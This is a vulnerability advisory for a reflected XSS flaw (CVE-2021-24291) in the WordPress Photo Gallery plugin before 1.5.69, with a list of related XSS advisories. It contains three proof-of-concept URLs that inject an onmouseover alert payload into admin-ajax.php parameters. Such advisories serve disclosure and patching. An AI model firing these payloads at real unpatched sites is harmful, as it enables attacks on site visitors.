Photo Gallery < 1.5.69 – Multiple Reflected Cross-Site Scripting (XSS) | CVE 2021-24291 | Plugin Vulnerabilities

Description

The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E

Affects Plugins

Fixed in 1.5.69

References

CVE

URL

https://packetstormsecurity.com/files/#162227/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ThuraMoeMyint

Verified

Yes

WPVDB ID

cfb982b2-8b6d-4345-b3ab-3d2b130b873a

Timeline

Publicly Published

2021-04-19 (about 4 years ago)

Added

2021-04-20 (about 4 years ago)

Last Updated

2021-04-27 (about 4 years ago)

Other

Published

Title

Published

2025-07-23

Title

CaptionPix <= 1.8 - Reflected Cross-Site Scripting

Published

2023-04-20

Title

CMS Tree Page View < 1.6.8 - Reflected XSS

Published

2017-12-18

Title

Share This Image <= 1.03 - Cross-Site Scripting (XSS)

Published

2024-02-27

Title

Jeg Elementor Kit < 2.6.3 - Contributor+ Stored Cross-Site Scripting

Published

2025-01-15

Title

Image Source Control < 2.29.1 - Reflected Cross-Site Scripting